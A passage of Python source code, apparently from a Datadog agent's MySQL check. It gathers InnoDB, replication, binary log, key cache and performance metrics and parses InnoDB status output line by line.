'Innodb_buffer_pool_bytes_used'] = innodb_buffer_pool_pages_used * innodb_page_size
except (KeyError, TypeError) as e:
self.log.error("Not all InnoDB buffer pool metrics are available, unable to compute: {0}".format(e))
if is_affirmative(options.get('extra_innodb_metrics', False)):
self.log.debug("Collecting Extra Innodb Metrics")
metrics.update(OPTIONAL_INNODB_VARS)
# Binary log statistics
if self._get_variable_enabled(results, 'log_bin'):
results[
'Binlog_space_usage_bytes'] = self._get_binary_log_stats(db)
# Compute key cache utilization metric
key_blocks_unused = self._collect_scalar('Key_blocks_unused', results)
key_cache_block_size = self._collect_scalar('key_cache_block_size', results)
key_buffer_size = self._collect_scalar('key_buffer_size', results)
results['Key_buffer_size'] = key_buffer_size
try:
# can be null if the unit is missing in the user config (4 instead of 4G for eg.)
if key_buffer_size != 0:
key_cache_utilization = 1 - ((key_blocks_unused * key_cache_block_size) / key_buffer_size)
results['Key_cache_utilization'] = key_cache_utilization
results['Key_buffer_bytes_used'] = self._collect_scalar(
'Key_blocks_used', results) * key_cache_block_size
results['Key_buffer_bytes_unflushed'] = self._collect_scalar(
'Key_blocks_not_flushed', results) * key_cache_block_size
except TypeError as e:
self.log.error("Not all Key metrics are available, unable to compute: {0}".format(e))
metrics.update(VARIABLES_VARS)
metrics.update(INNODB_VARS)
metrics.update(BINLOG_VARS)
if is_affirmative(options.get('extra_status_metrics', False)):
self.log.debug("Collecting Extra Status Metrics")
metrics.update(OPTIONAL_STATUS_VARS)
if self._version_compatible(db, (5, 6, 6)):
metrics.update(OPTIONAL_STATUS_VARS_5_6_6)
if is_affirmative(options.get('galera_cluster', False)):
# already in result-set after 'SHOW STATUS' just add vars to collect
self.log.debug("Collecting Galera Metrics.")
metrics.update(GALERA_VARS)
performance_schema_enabled = self._get_variable_enabled(results, 'performance_schema')
above_560 = self._version_compatible(db, (5, 6, 0))
if is_affirmative(options.get('extra_performance_metrics', False)) and above_560 and performance_schema_enabled:
# report avg query response time per schema to Datadog
results['perf_digest_95th_percentile_avg_us'] = self._get_query_exec_time_95th_us(db)
results['query_run_time_avg'] = self._query_exec_time_per_schema(db)
metrics.update(PERFORMANCE_VARS)
if is_affirmative(options.get('schema_size_metrics', False)):
# report avg query response time per schema to Datadog
results['information_schema_size'] = self._query_size_per_schema(db)
metrics.update(SCHEMA_VARS)
if is_affirmative(options.get('replication', False)):
# Get replica stats
is_mariadb = self._get_is_mariadb(db)
replication_channel = options.get('replication_channel')
if replication_channel:
self.service_check_tags.append("channel:{0}".format(replication_channel))
tags.append("channel:{0}".format(replication_channel))
results.update(self._get_replica_stats(db, is_mariadb, replication_channel))
nonblocking = is_affirmative(options.get('replication_non_blocking_status', False))
results.update(self._get_slave_status(db, above_560, nonblocking))
metrics.update(REPLICA_VARS)
# get slave running form global status page
slave_running_status = AgentCheck.UNKNOWN
slave_running = self._collect_string('Slave_running', results)
binlog_running = results.get('Binlog_enabled', False)
# slaves will only be collected iff user has PROCESS privileges.
slaves = self._collect_scalar('Slaves_connected', results)
slave_io_running = self._collect_type('Slave_IO_Running', results, dict)
slave_sql_running = self._collect_type('Slave_SQL_Running', results, dict)
if slave_io_running:
slave_io_running = any(v.lower().strip() == 'yes' for v in itervalues(slave_io_running))
if slave_sql_running:
slave_sql_running = any(v.lower().strip() == 'yes' for v in itervalues(slave_sql_running))
# MySQL 5.7.x might not have 'Slave_running'. See: https://bugs.mysql.com/bug.php?id=78544
# look at replica vars collected at the top of if-block
if self._version_compatible(db, (5, 7, 0)):
if not (slave_io_running is None and slave_sql_running is None):
if slave_io_running and slave_sql_running:
slave_running_status = AgentCheck.OK
elif not slave_io_running and not slave_sql_running:
slave_running_status = AgentCheck.CRITICAL
else:
# not everything is running smoothly
slave_running_status = AgentCheck.WARNING
elif slave_running.lower().strip() == 'off':
if not (slave_io_running is None and slave_sql_running is None):
if not slave_io_running and not slave_sql_running:
slave_running_status = AgentCheck.CRITICAL
# if we don't yet have a status - inspect
if slave_running_status == AgentCheck.UNKNOWN:
if self._is_master(slaves, results): # master
if slaves > 0 and binlog_running:
slave_running_status = AgentCheck.OK
else:
slave_running_status = AgentCheck.WARNING
elif slave_running: # slave (or standalone)
if slave_running.lower().strip() == 'on':
slave_running_status = AgentCheck.OK
else:
slave_running_status = AgentCheck.CRITICAL
# deprecated in favor of service_check("mysql.replication.slave_running")
self.gauge(self.SLAVE_SERVICE_CHECK_NAME, 1 if slave_running_status == AgentCheck.OK else 0, tags=tags)
self.service_check(self.SLAVE_SERVICE_CHECK_NAME, slave_running_status, tags=self.service_check_tags)
# "synthetic" metrics
metrics.update(SYNTHETIC_VARS)
self._compute_synthetic_results(results)
# remove uncomputed metrics
for k in SYNTHETIC_VARS:
if k not in results:
metrics.pop(k, None)
# add duped metrics - reporting some as both rate and gauge
dupes = [('Table_locks_waited', 'Table_locks_waited_rate'),
('Table_locks_immediate', 'Table_locks_immediate_rate')]
for src, dst in dupes:
if src in results:
results[dst] = results[src]
self._submit_metrics(metrics, results, tags)
# Collect custom query metrics
# Max of 20 queries allowed
if isinstance(queries, list):
for index, check in enumerate(queries[:max_custom_queries]):
total_tags = tags + check.get('tags', [])
self._collect_dict(check['type'],
{check['field']: check['metric']},
check['query'],
db,
tags=total_tags)
if len(queries) > max_custom_queries:
self.warning("Maximum number (%s) of custom queries reached. Skipping the rest."
% max_custom_queries)
def _is_master(self, slaves, results):
# master uuid only collected in slaves
master_host = self._collect_string('Master_Host', results)
if slaves > 0 or not master_host:
return True
return False
    def _collect_metadata(self, db):
        # Report the dotted server version (e.g. "5.7.21") as agent metadata.
        version = self._get_version(db)
        self.service_metadata('version', ".".join(version))
def _submit_metrics(self, variables, db_results, tags):
for variable, metric in iteritems(variables):
metric_name, metric_type = metric
for tag, value in self._collect_all_scalars(variable, db_results):
metric_tags = list(tags)
if tag:
metric_tags.append(tag)
if value is not None:
if metric_type == RATE:
self.rate(metric_name, value, tags=metric_tags)
elif metric_type == GAUGE:
self.gauge(metric_name, value, tags=metric_tags)
elif metric_type == COUNT:
self.count(metric_name, value, tags=metric_tags)
elif metric_type == MONOTONIC:
self.monotonic_count(metric_name, value, tags=metric_tags)
def _version_compatible(self, db, compat_version):
# some patch version numbers contain letters (e.g. 5.0.51a)
# so let's be careful when we compute the version number
try:
mysql_version = self._get_version(db)
except Exception as e:
self.warning("Cannot compute mysql version, assuming it's older.: %s"
% str(e))
return False
self.log.debug("MySQL version %s" % mysql_version)
patchlevel = int(re.match(r"([0-9]+)", mysql_version[2]).group(1))
version = (int(mysql_version[0]), int(mysql_version[1]), patchlevel)
return version >= compat_version
def _get_version(self, db):
hostkey = self._get_host_key()
if hostkey in self.mysql_version:
version = self.mysql_version[hostkey]
return version
# Get MySQL version
with closing(db.cursor()) as cursor:
cursor.execute('SELECT VERSION()')
result = cursor.fetchone()
# Version might include a description e.g. 4.1.26-log.
# See
# http://dev.mysql.com/doc/refman/4.1/en/information-functions.html#function_version
version = result[0].split('-')
version = version[0].split('.')
self.mysql_version[hostkey] = version
return version
@classmethod
def _get_is_mariadb(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute('SELECT VERSION() LIKE "%MariaDB%"')
result = cursor.fetchone()
return result[0] == 1
def _collect_all_scalars(self, key, dictionary):
if key not in dictionary or dictionary[key] is None:
yield None, None
elif isinstance(dictionary[key], dict):
for tag, _ in iteritems(dictionary[key]):
yield tag, self._collect_type(tag, dictionary[key], float)
else:
yield None, self._collect_type(key, dictionary, float)
    def _collect_scalar(self, key, mapping):
        # Convenience wrapper: fetch `key` from `mapping` as a float (or None).
        return self._collect_type(key, mapping, float)
    def _collect_string(self, key, mapping):
        # Convenience wrapper: fetch `key` from `mapping` as text (or None).
        return self._collect_type(key, mapping, text_type)
def _collect_type(self, key, mapping, the_type):
self.log.debug("Collecting data with %s" % key)
if key not in mapping:
self.log.debug("%s returned None" % key)
return None
self.log.debug("Collecting done, value %s" % mapping[key])
return the_type(mapping[key])
    def _collect_dict(self, metric_type, field_metric_map, query, db, tags):
        """Run a custom query and submit selected columns as metrics.

        For each (field, metric) pair, the field is located by name in the
        cursor description of the query's first row and submitted under
        `metric` with the given `metric_type` (gauge is the fallback).
        Query errors are logged as warnings, never raised.

        query: show status...
        field_metric_map: {"Seconds_behind_master": "mysqlSecondsBehindMaster"}
        """
        try:
            with closing(db.cursor()) as cursor:
                cursor.execute(query)
                result = cursor.fetchone()
                if result is not None:
                    for field, metric in list(iteritems(field_metric_map)):
                        # Find the column name in the cursor description to identify the column index
                        # http://www.python.org/dev/peps/pep-0249/
                        # cursor.description is a tuple of (column_name, ..., ...)
                        try:
                            col_idx = [d[0].lower() for d in cursor.description].index(field.lower())
                            self.log.debug("Collecting metric: %s" % metric)
                            if result[col_idx] is not None:
                                self.log.debug(
                                    "Collecting done, value %s" % result[col_idx])
                                if metric_type == GAUGE:
                                    self.gauge(metric, float(result[col_idx]), tags=tags)
                                elif metric_type == RATE:
                                    self.rate(metric, float(result[col_idx]), tags=tags)
                                else:
                                    # unknown types fall back to gauge
                                    self.gauge(metric, float(result[col_idx]), tags=tags)
                            else:
                                self.log.debug(
                                    "Received value is None for index %d" % col_idx)
                        except ValueError:
                            self.log.exception("Cannot find %s in the columns %s"
                                               % (field, cursor.description))
        except Exception:
            self.warning("Error while running %s\n%s" %
                         (query, traceback.format_exc()))
            self.log.exception("Error while running %s" % query)
    def _is_localhost(self, host, port):
        # The server needs to run locally, accessed by TCP or socket
        # port == 0 means a unix-socket connection, which is local by definition.
        return host in ["localhost", "127.0.0.1", "0.0.0.0"] or port == long(0)
def _collect_system_metrics(self, host, db, tags):
try:
pid = None
if self._is_localhost(host, db.port):
pid = self._get_server_pid(db)
if pid:
self.log.debug("System metrics for mysql w/ pid: %s" % pid)
# At last, get mysql cpu data out of psutil or procfs
ucpu, scpu = None, None
if PSUTIL_AVAILABLE:
proc = psutil.Process(pid)
ucpu = proc.cpu_times()[0]
scpu = proc.cpu_times()[1]
if ucpu and scpu:
self.rate("mysql.performance.user_time", ucpu, tags=tags)
# should really be system_time
self.rate("mysql.performance.kernel_time", scpu, tags=tags)
self.rate("mysql.performance.cpu_time", ucpu+scpu, tags=tags)
except Exception:
self.warning("Error while reading mysql (pid: %s) procfs data\n%s"
% (pid, traceback.format_exc()))
def _get_pid_file_variable(self, db):
"""
Get the `pid_file` variable
"""
pid_file = None
try:
with closing(db.cursor()) as cursor:
cursor.execute("SHOW VARIABLES LIKE 'pid_file'")
pid_file = cursor.fetchone()[1]
except Exception:
self.warning("Error while fetching pid_file variable of MySQL.")
return pid_file
    def _get_server_pid(self, db):
        """Best-effort lookup of the local mysqld process id.

        First reads the file named by the server's `pid_file` variable; if
        that fails (e.g. permissions), falls back to scanning the process
        table with psutil. Returns None when no pid could be found.
        """
        pid = None
        # Try to get pid from pid file, it can fail for permission reason
        pid_file = self._get_pid_file_variable(db)
        if pid_file is not None:
            self.log.debug("pid file: %s" % str(pid_file))
            try:
                with open(pid_file, 'rb') as f:
                    pid = int(f.readline())
            except IOError:
                self.log.debug("Cannot read mysql pid file %s" % pid_file)
        # If pid has not been found, read it from ps
        if pid is None and PSUTIL_AVAILABLE:
            # PROC_NAME is a module-level constant (presumably 'mysqld' — confirm).
            for proc in psutil.process_iter():
                try:
                    if proc.name() == PROC_NAME:
                        pid = proc.pid
                except (psutil.AccessDenied, psutil.ZombieProcess, psutil.NoSuchProcess):
                    # Processes can vanish or be unreadable mid-scan; skip them.
                    continue
                except Exception:
                    self.log.exception("Error while fetching mysql pid from psutil")
        return pid
@classmethod
def _get_stats_from_status(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute("SHOW /*!50002 GLOBAL */ STATUS;")
results = dict(cursor.fetchall())
return results
@classmethod
def _get_stats_from_variables(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute("SHOW GLOBAL VARIABLES;")
results = dict(cursor.fetchall())
return results
def _get_binary_log_stats(self, db):
try:
with closing(db.cursor()) as cursor:
cursor.execute("SHOW BINARY LOGS;")
cursor_results = cursor.fetchall()
master_logs = {result[0]: result[1] for result in cursor_results}
binary_log_space = 0
for key, value in iteritems(master_logs):
binary_log_space += value
return binary_log_space
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Privileges error accessing the BINARY LOGS (must grant REPLICATION CLIENT): %s" % str(e))
return None
    def _is_innodb_engine_enabled(self, db):
        """Return True when the InnoDB storage engine is available and enabled.

        Returns False (with a warning) when the ENGINES table cannot be
        queried, e.g. for privilege reasons.
        """
        # Whether InnoDB engine is available or not can be found out either
        # from the output of SHOW ENGINES or from information_schema.ENGINES
        # table. The latter is chosen because it involves no string parsing.
        try:
            with closing(db.cursor()) as cursor:
                cursor.execute(
                    "select engine from information_schema.ENGINES where engine='InnoDB' and \
                    support != 'no' and support != 'disabled'"
                )
                # rowcount > 0 means at least one enabled InnoDB row matched.
                return cursor.rowcount > 0
        except (pymysql.err.InternalError, pymysql.err.OperationalError, pymysql.err.NotSupportedError) as e:
            self.warning("Possibly innodb stats unavailable - error querying engines table: %s" % str(e))
            return False
    def _get_replica_stats(self, db, is_mariadb, replication_channel):
        """Collect SHOW SLAVE STATUS fields, keyed per replication channel.

        Returns a dict mapping each slave-status field name to a
        {'channel:<name>': value} dict, plus a top-level 'Binlog_enabled'
        flag derived from SHOW MASTER STATUS. Privilege errors are logged
        as warnings and yield partial (possibly empty) results.
        """
        replica_results = defaultdict(dict)
        try:
            with closing(db.cursor(pymysql.cursors.DictCursor)) as cursor:
                if is_mariadb and replication_channel:
                    # MariaDB selects the channel through a session variable
                    # instead of MySQL's FOR CHANNEL clause.
                    cursor.execute("SET @@default_master_connection = '{0}';".format(replication_channel))
                    cursor.execute("SHOW SLAVE STATUS;")
                elif replication_channel:
                    cursor.execute("SHOW SLAVE STATUS FOR CHANNEL '{0}';".format(replication_channel))
                else:
                    cursor.execute("SHOW SLAVE STATUS;")
                for slave_result in cursor.fetchall():
                    # MySQL <5.7 does not have Channel_Name.
                    # For MySQL >=5.7 'Channel_Name' is set to an empty string by default
                    channel = replication_channel or slave_result.get('Channel_Name') or 'default'
                    for key, value in iteritems(slave_result):
                        if value is not None:
                            replica_results[key]['channel:{0}'.format(channel)] = value
        except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
            errno, msg = e.args
            # Error 1617: asking a MariaDB master for a named connection it
            # doesn't have — expected on masters, so stay silent.
            if errno == 1617 and msg == "There is no master connection '{0}'".format(replication_channel):
                # MariaDB complains when you try to get slave status with a
                # connection name on the master, without connection name it
                # responds an empty string as expected.
                # Mysql behaves the same with or without connection name.
                pass
            else:
                self.warning("Privileges error getting replication status (must grant REPLICATION CLIENT): %s" % str(e))
        try:
            with closing(db.cursor(pymysql.cursors.DictCursor)) as cursor:
                cursor.execute("SHOW MASTER STATUS;")
                binlog_results = cursor.fetchone()
                # Any row at all means the binary log is enabled on this server.
                if binlog_results:
                    replica_results.update({'Binlog_enabled': True})
        except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
            self.warning("Privileges error getting binlog information (must grant REPLICATION CLIENT): %s" % str(e))
        return replica_results
def _get_slave_status(self, db, above_560, nonblocking):
"""
Retrieve the slaves' statuses using:
1. The `performance_schema.threads` table. Non-blocking, requires version > 5.6.0
2. The `information_schema.processlist` table. Blocking
"""
try:
with closing(db.cursor()) as cursor:
if above_560 and nonblocking:
# Query `performance_schema.threads` instead of `
# information_schema.processlist` to avoid mutex impact on performance.
cursor.execute("SELECT THREAD_ID, NAME FROM performance_schema.threads WHERE NAME LIKE '%worker'")
else:
cursor.execute("SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST WHERE COMMAND LIKE '%Binlog dump%'")
slave_results = cursor.fetchall()
slaves = 0
for _ in slave_results:
slaves += 1
return {'Slaves_connected': slaves}
except (pymysql.err.InternalError, pymysql.err.OperationalError) as e:
self.warning("Privileges error accessing the process tables (must grant PROCESS): %s" % str(e))
return {}
@classmethod
def _are_values_numeric(cls, array):
return all(v.isdigit() for v in array)
    def _get_stats_from_innodb_status(self, db):
        """Parse `SHOW ENGINE INNODB STATUS` output into a metrics dict.

        Walks the status text one line at a time (heavily inspired by the
        Percona monitoring plugins) and accumulates counters in a
        defaultdict(int). Values are converted back to strings at the end for
        consistency with SHOW GLOBAL STATUS. Returns {} when the status output
        is unavailable (missing PROCESS privilege, or e.g. an Aurora read
        replica returning no rows).
        """
        # There are a number of important InnoDB metrics that are reported in
        # InnoDB status but are not otherwise present as part of the STATUS
        # variables in MySQL. Majority of these metrics are reported though
        # as a part of STATUS variables in Percona Server and MariaDB.
        # Requires querying user to have PROCESS privileges.
        try:
            with closing(db.cursor()) as cursor:
                cursor.execute("SHOW /*!50000 ENGINE*/ INNODB STATUS")
        except (pymysql.err.InternalError, pymysql.err.OperationalError, pymysql.err.NotSupportedError) as e:
            self.warning("Privilege error or engine unavailable accessing the INNODB status \
                         tables (must grant PROCESS): %s" % str(e))
            return {}
        if cursor.rowcount < 1:
            # No data from SHOW ENGINE STATUS, even though the engine is enabled.
            # EG: This could be an Aurora Read Instance
            self.warning("""'SHOW ENGINE INNODB STATUS' returned no data.
                If you are running an Aurora Read Instace, \
                this is expected and you should disable the innodb metrics collection""")
            return {}
        innodb_status = cursor.fetchone()
        # Row shape is (Type, Name, Status); the status text is column 2.
        innodb_status_text = innodb_status[2]
        results = defaultdict(int)
        # Here we now parse InnoDB STATUS one line at a time
        # This is heavily inspired by the Percona monitoring plugins work
        txn_seen = False
        prev_line = ''
        # Only return aggregated buffer pool metrics
        buffer_id = -1
        for line in innodb_status_text.splitlines():
            line = line.strip()
            row = re.split(" +", line)
            row = [item.strip(',') for item in row]
            row = [item.strip(';') for item in row]
            row = [item.strip('[') for item in row]
            row = [item.strip(']') for item in row]
            if line.startswith('---BUFFER POOL'):
                buffer_id = long(row[2])
            # SEMAPHORES
            if line.find('Mutex spin waits') == 0:
                # Mutex spin waits 79626940, rounds 157459864, OS waits 698719
                # Mutex spin waits 0, rounds 247280272495, OS waits 316513438
                results['Innodb_mutex_spin_waits'] = long(row[3])
                results['Innodb_mutex_spin_rounds'] = long(row[5])
                results['Innodb_mutex_os_waits'] = long(row[8])
            elif line.find('RW-shared spins') == 0 and line.find(';') > 0:
                # RW-shared spins 3859028, OS waits 2100750; RW-excl spins
                # 4641946, OS waits 1530310
                results['Innodb_s_lock_spin_waits'] = long(row[2])
                results['Innodb_x_lock_spin_waits'] = long(row[8])
                results['Innodb_s_lock_os_waits'] = long(row[5])
                results['Innodb_x_lock_os_waits'] = long(row[11])
            elif line.find('RW-shared spins') == 0 and line.find('; RW-excl spins') == -1:
                # Post 5.5.17 SHOW ENGINE INNODB STATUS syntax
                # RW-shared spins 604733, rounds 8107431, OS waits 241268
                results['Innodb_s_lock_spin_waits'] = long(row[2])
                results['Innodb_s_lock_spin_rounds'] = long(row[4])
                results['Innodb_s_lock_os_waits'] = long(row[7])
            elif line.find('RW-excl spins') == 0:
                # Post 5.5.17 SHOW ENGINE INNODB STATUS syntax
                # RW-excl spins 604733, rounds 8107431, OS waits 241268
                results['Innodb_x_lock_spin_waits'] = long(row[2])
                results['Innodb_x_lock_spin_rounds'] = long(row[4])
                results['Innodb_x_lock_os_waits'] = long(row[7])
            elif line.find('seconds the semaphore:') > 0:
                # --Thread 907205 has waited at handler/ha_innodb.cc line 7156 for 1.00 seconds the semaphore:
                results['Innodb_semaphore_waits'] += 1
                results[
                    'Innodb_semaphore_wait_time'] += long(float(row[9])) * 1000
            # TRANSACTIONS
            elif line.find('Trx id counter') == 0:
                # The beginning of the TRANSACTIONS section: start counting
                # transactions
                # Trx id counter 0 1170664159
                # Trx id counter 861B144C
                txn_seen = True
            elif line.find('History list length') == 0:
                # History list length 132
                results['Innodb_history_list_length'] = long(row[3])
            elif txn_seen and line.find('---TRANSACTION') == 0:
                # ---TRANSACTION 0, not started, process no 13510, OS thread id 1170446656
                results['Innodb_current_transactions'] += 1
                if line.find('ACTIVE') > 0:
                    results['Innodb_active_transactions'] += 1
            elif txn_seen and line.find('------- TRX HAS BEEN') == 0:
                # ------- TRX HAS BEEN WAITING 32 SEC FOR THIS LOCK TO BE GRANTED:
                results['Innodb_row_lock_time'] += long(row[5]) * 1000
            elif line.find('read views open inside InnoDB') > 0:
                # 1 read views open inside InnoDB
                results['Innodb_read_views'] = long(row[0])
            elif line.find('mysql tables in use') == 0:
                # mysql tables in use 2, locked 2
                results['Innodb_tables_in_use'] += long(row[4])
                results['Innodb_locked_tables'] += long(row[6])
            elif txn_seen and line.find('lock struct(s)') > 0:
                # 23 lock struct(s), heap size 3024, undo log entries 27
                # LOCK WAIT 12 lock struct(s), heap size 3024, undo log entries 5
                # LOCK WAIT 2 lock struct(s), heap size 368
                if line.find('LOCK WAIT') == 0:
                    results['Innodb_lock_structs'] += long(row[2])
                    results['Innodb_locked_transactions'] += 1
                elif line.find('ROLLING BACK') == 0:
                    # ROLLING BACK 127539 lock struct(s), heap size 15201832,
                    # 4411492 row lock(s), undo log entries 1042488
                    results['Innodb_lock_structs'] += long(row[2])
                else:
                    results['Innodb_lock_structs'] += long(row[0])
            # FILE I/O
            elif line.find(' OS file reads, ') > 0:
                # 8782182 OS file reads, 15635445 OS file writes, 947800 OS
                # fsyncs
                results['Innodb_os_file_reads'] = long(row[0])
                results['Innodb_os_file_writes'] = long(row[4])
                results['Innodb_os_file_fsyncs'] = long(row[8])
            elif line.find('Pending normal aio reads:') == 0:
                # This line's shape varies a lot between InnoDB versions, so
                # dispatch on the token count of the split row.
                try:
                    if len(row) == 8:
                        # (len(row) == 8) Pending normal aio reads: 0, aio writes: 0,
                        results['Innodb_pending_normal_aio_reads'] = long(row[4])
                        results['Innodb_pending_normal_aio_writes'] = long(row[7])
                    elif len(row) == 14:
                        # (len(row) == 14) Pending normal aio reads: 0 [0, 0] , aio writes: 0 [0, 0] ,
                        results['Innodb_pending_normal_aio_reads'] = long(row[4])
                        results['Innodb_pending_normal_aio_writes'] = long(row[10])
                    elif len(row) == 16:
                        # (len(row) == 16) Pending normal aio reads: [0, 0, 0, 0] , aio writes: [0, 0, 0, 0] ,
                        if self._are_values_numeric(row[4:8]) and self._are_values_numeric(row[11:15]):
                            results['Innodb_pending_normal_aio_reads'] = (long(row[4]) + long(row[5]) +
                                                                          long(row[6]) + long(row[7]))
                            results['Innodb_pending_normal_aio_writes'] = (long(row[11]) + long(row[12]) +
                                                                           long(row[13]) + long(row[14]))
                        # (len(row) == 16) Pending normal aio reads: 0 [0, 0, 0, 0] , aio writes: 0 [0, 0] ,
                        elif self._are_values_numeric(row[4:9]) and self._are_values_numeric(row[12:15]):
                            results['Innodb_pending_normal_aio_reads'] = long(row[4])
                            results['Innodb_pending_normal_aio_writes'] = long(row[12])
                        else:
                            self.log.warning("Can't parse result line %s" % line)
                    elif len(row) == 18:
                        # (len(row) == 18) Pending normal aio reads: 0 [0, 0, 0, 0] , aio writes: 0 [0, 0, 0, 0] ,
                        results['Innodb_pending_normal_aio_reads'] = long(row[4])
                        results['Innodb_pending_normal_aio_writes'] = long(row[12])
                    elif len(row) == 22:
                        # (len(row) == 22)
                        # Pending normal aio reads: 0 [0, 0, 0, 0, 0, 0, 0, 0] , aio writes: 0 [0, 0, 0, 0] ,
                        results['Innodb_pending_normal_aio_reads'] = long(row[4])
                        results['Innodb_pending_normal_aio_writes'] = long(row[16])
                except ValueError as e:
                    self.log.warning("Can't parse result line %s: %s", line, e)
            elif line.find('ibuf aio reads') == 0:
                # ibuf aio reads: 0, log i/o's: 0, sync i/o's: 0
                # or ibuf aio reads:, log i/o's:, sync i/o's:
                if len(row) == 10:
                    results['Innodb_pending_ibuf_aio_reads'] = long(row[3])
                    results['Innodb_pending_aio_log_ios'] = long(row[6])
                    results['Innodb_pending_aio_sync_ios'] = long(row[9])
                elif len(row) == 7:
                    results['Innodb_pending_ibuf_aio_reads'] = 0
                    results['Innodb_pending_aio_log_ios'] = 0
                    results['Innodb_pending_aio_sync_ios'] = 0
            elif line.find('Pending flushes (fsync)') == 0:
                # Pending flushes (fsync) log: 0; buffer pool: 0
                results['Innodb_pending_log_flushes'] = long(row[4])
                results['Innodb_pending_buffer_pool_flushes'] = long(row[7])
            # INSERT BUFFER AND ADAPTIVE HASH INDEX
            elif line.find('Ibuf for space 0: size ') == 0:
                # Older InnoDB code seemed to be ready for an ibuf per tablespace. It
                # had two lines in the output. Newer has just one line, see below.
                # Ibuf for space 0: size 1, free list len 887, seg size 889, is not empty
                # Ibuf for space 0: size 1, free list len 887, seg size 889,
                results['Innodb_ibuf_size'] = long(row[5])
                results['Innodb_ibuf_free_list'] = long(row[9])
                results['Innodb_ibuf_segment_size'] = long(row[12])
            elif line.find('Ibuf: size ') == 0:
                # Ibuf: size 1, free list len 4634, seg size 4636,
                results['Innodb_ibuf_size'] = long(row[2])
                results['Innodb_ibuf_free_list'] = long(row[6])
                results['Innodb_ibuf_segment_size'] = long(row[9])
                if line.find('merges') > -1:
                    results['Innodb_ibuf_merges'] = long(row[10])
            elif line.find(', delete mark ') > 0 and prev_line.find('merged operations:') == 0:
                # Output of show engine innodb status has changed in 5.5
                # merged operations:
                # insert 593983, delete mark 387006, delete 73092
                results['Innodb_ibuf_merged_inserts'] = long(row[1])
                results['Innodb_ibuf_merged_delete_marks'] = long(row[4])
                results['Innodb_ibuf_merged_deletes'] = long(row[6])
                results['Innodb_ibuf_merged'] = results['Innodb_ibuf_merged_inserts'] + results[
                    'Innodb_ibuf_merged_delete_marks'] + results['Innodb_ibuf_merged_deletes']
            elif line.find(' merged recs, ') > 0:
                # 19817685 inserts, 19817684 merged recs, 3552620 merges
                results['Innodb_ibuf_merged_inserts'] = long(row[0])
                results['Innodb_ibuf_merged'] = long(row[2])
                results['Innodb_ibuf_merges'] = long(row[5])
            elif line.find('Hash table size ') == 0:
                # In some versions of InnoDB, the used cells is omitted.
                # Hash table size 4425293, used cells 4229064, ....
                # Hash table size 57374437, node heap has 72964 buffer(s) <--
                # no used cells
                results['Innodb_hash_index_cells_total'] = long(row[3])
                results['Innodb_hash_index_cells_used'] = long(
                    row[6]) if line.find('used cells') > 0 else 0
            # LOG
            elif line.find(" log i/o's done, ") > 0:
                # 3430041 log i/o's done, 17.44 log i/o's/second
                # 520835887 log i/o's done, 17.28 log i/o's/second, 518724686
                # syncs, 2980893 checkpoints
                results['Innodb_log_writes'] = long(row[0])
            elif line.find(" pending log writes, ") > 0:
                # 0 pending log writes, 0 pending chkp writes
                results['Innodb_pending_log_writes'] = long(row[0])
                results['Innodb_pending_checkpoint_writes'] = long(row[4])
            elif line.find("Log sequence number") == 0:
                # This number is NOT printed in hex in InnoDB plugin.
                # Log sequence number 272588624
                results['Innodb_lsn_current'] = long(row[3])
            elif line.find("Log flushed up to") == 0:
                # This number is NOT printed in hex in InnoDB plugin.
                # Log flushed up to 272588624
                results['Innodb_lsn_flushed'] = long(row[4])
            elif line.find("Last checkpoint at") == 0:
                # Last checkpoint at 272588624
                results['Innodb_lsn_last_checkpoint'] = long(row[3])
            # BUFFER POOL AND MEMORY
            elif line.find("Total memory allocated") == 0 and line.find("in additional pool allocated") > 0:
                # Total memory allocated 29642194944; in additional pool allocated 0
                # Total memory allocated by read views 96
                results['Innodb_mem_total'] = long(row[3])
                results['Innodb_mem_additional_pool'] = long(row[8])
            elif line.find('Adaptive hash index ') == 0:
                # Adaptive hash index 1538240664 (186998824 + 1351241840)
                results['Innodb_mem_adaptive_hash'] = long(row[3])
            elif line.find('Page hash ') == 0:
                # Page hash 11688584
                results['Innodb_mem_page_hash'] = long(row[2])
            elif line.find('Dictionary cache ') == 0:
                # Dictionary cache 145525560 (140250984 + 5274576)
                results['Innodb_mem_dictionary'] = long(row[2])
            elif line.find('File system ') == 0:
                # File system 313848 (82672 + 231176)
                results['Innodb_mem_file_system'] = long(row[2])
            elif line.find('Lock system ') == 0:
                # Lock system 29232616 (29219368 + 13248)
                results['Innodb_mem_lock_system'] = long(row[2])
            elif line.find('Recovery system ') == 0:
                # Recovery system 0 (0 + 0)
                results['Innodb_mem_recovery_system'] = long(row[2])
            elif line.find('Threads ') == 0:
                # Threads 409336 (406936 + 2400)
                results['Innodb_mem_thread_hash'] = long(row[1])
            elif line.find("Buffer pool size ") == 0:
                # The " " after size is necessary to avoid matching the wrong line:
                # Buffer pool size 1769471
                # Buffer pool size, bytes 28991012864
                if buffer_id == -1:
                    results['Innodb_buffer_pool_pages_total'] = long(row[3])
            elif line.find("Free buffers") == 0:
                # Free buffers 0
                if buffer_id == -1:
                    results['Innodb_buffer_pool_pages_free'] = long(row[2])
            elif line.find("Database pages") == 0:
                # Database pages 1696503
                if buffer_id == -1:
                    results['Innodb_buffer_pool_pages_data'] = long(row[2])
            elif line.find("Modified db pages") == 0:
                # Modified db pages 160602
                if buffer_id == -1:
                    results['Innodb_buffer_pool_pages_dirty'] = long(row[3])
            elif line.find("Pages read ahead") == 0:
                # Must do this BEFORE the next test, otherwise it'll get fooled by this
                # line from the new plugin:
                # Pages read ahead 0.00/s, evicted without access 0.06/s
                pass
            elif line.find("Pages read") == 0:
                # Pages read 15240822, created 1770238, written 21705836
                if buffer_id == -1:
                    results['Innodb_pages_read'] = long(row[2])
                    results['Innodb_pages_created'] = long(row[4])
                    results['Innodb_pages_written'] = long(row[6])
            # ROW OPERATIONS
            elif line.find('Number of rows inserted') == 0:
                # Number of rows inserted 50678311, updated 66425915, deleted
                # 20605903, read 454561562
                results['Innodb_rows_inserted'] = long(row[4])
                results['Innodb_rows_updated'] = long(row[6])
                results['Innodb_rows_deleted'] = long(row[8])
                results['Innodb_rows_read'] = long(row[10])
            elif line.find(" queries inside InnoDB, ") > 0:
